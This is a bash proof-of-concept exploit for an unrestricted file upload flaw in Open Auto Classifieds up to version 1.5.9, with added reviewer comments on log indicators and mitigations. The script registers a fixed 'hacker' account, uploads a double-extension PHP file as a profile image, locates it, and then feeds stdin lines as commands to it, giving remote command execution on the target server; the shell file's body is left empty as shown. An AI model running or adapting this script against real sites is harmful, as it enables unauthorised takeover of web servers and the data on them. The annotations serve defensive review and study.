#!/bin/bash
# File Upload exploit for Open Auto Classifieds version <= 1.5.9
#
# Researched by Andrew Horton (urbanadventurer)
# (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/
#
# Reviewer notes (what this proof of concept demonstrates):
#   * Weakness class: unrestricted file upload. The script submits a file
#     named "evilimage.jpg.php" through the "image" field of useredit.php and
#     then requests it under images/users/, so it relies on the application
#     accepting a double extension and on that directory being served with
#     PHP execution enabled (inferred from the requests below, not from the
#     application source).
#   * The "max=524288" size limit is a form field sent by the client, so it
#     is not a server-side control.
#   * Log indicators visible in this script: POST register.php with
#     user=hacker / email=foo@bar.com, POST login.php, multipart POST to
#     useredit.php, GET member.php, then requests to
#     images/users/hacker<4 digits>evilimage.jpg.php carrying a "cmd"
#     parameter (GET first, POST afterwards).
#   * Mitigations to check on an affected install: allow-list on the final
#     file extension plus server-side content validation, server-generated
#     stored file names, and no script execution in the upload directory
#     (or uploads stored outside the web root).

# Usage text. The argument placeholder after "$0" is absent in the page text
# (presumably lost in extraction); the strings are kept as they appear.
if [[ -z "$1" ]]; then
  echo "Usage: $0 "
  echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9"
  echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell."
  echo -e "eg. $0 http://www.myweb.com/cardealer/\n"
  exit
fi

base_url="$1"
jar="cookiejar"                  # curl cookie store, created in the current directory
upload_name="evilimage.jpg.php"  # double extension: image-looking name, .php suffix

# The page text carries no payload body: as written, this creates a file
# that holds a single newline.
echo "" > "$upload_name"

# Step 1: self-registration with fixed credentials (hacker / 31337).
echo "Registering user"
curl -c "$jar" \
  -d "user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" \
  "$base_url/register.php" >/dev/null 2>&1

# Step 2: authenticate so the session cookie lands in the jar.
echo "Login"
curl -b "$jar" -c "$jar" \
  -d "user=hacker&pass=31337&submit=Login" \
  "$base_url/login.php" >/dev/null 2>&1

# Step 3: submit the file as the account's profile image.
echo "Upload command shell as user image"
curl -b "$jar" -c "$jar" \
  -F "image=@$upload_name" \
  -F "max=524288" \
  -F "addimage=Submit" \
  "$base_url/useredit.php" >/dev/null 2>&1

# Step 4: the stored file name contains a 4-digit number; it is scraped from
# the "_thumb.jpg" reference on member.php. If nothing matches, the value is
# empty and the URL below is built without it.
thumb_id=$(curl -b "$jar" -c "$jar" "$base_url/member.php" 2>/dev/null \
  | grep _thumb.jpg \
  | grep -E -o "[0-9]{4}")

# Local artefacts are removed before the uploaded file is requested.
rm -f "$jar" "$upload_name"

shell_url="$base_url/images/users/hacker${thumb_id}$upload_name"

# Step 5: one GET with cmd=id to confirm the upload is reachable.
echo "Command shell found at : ${shell_url}?cmd=id"
curl "${shell_url}?cmd=id" 2>/dev/null

# Step 6: every line read from stdin is POSTed as the "cmd" field to the
# uploaded file; in server logs this is a run of POSTs to a .php path under
# images/users/.
while read input_line; do
  curl -d "cmd=$input_line" "$shell_url" 2>/dev/null
done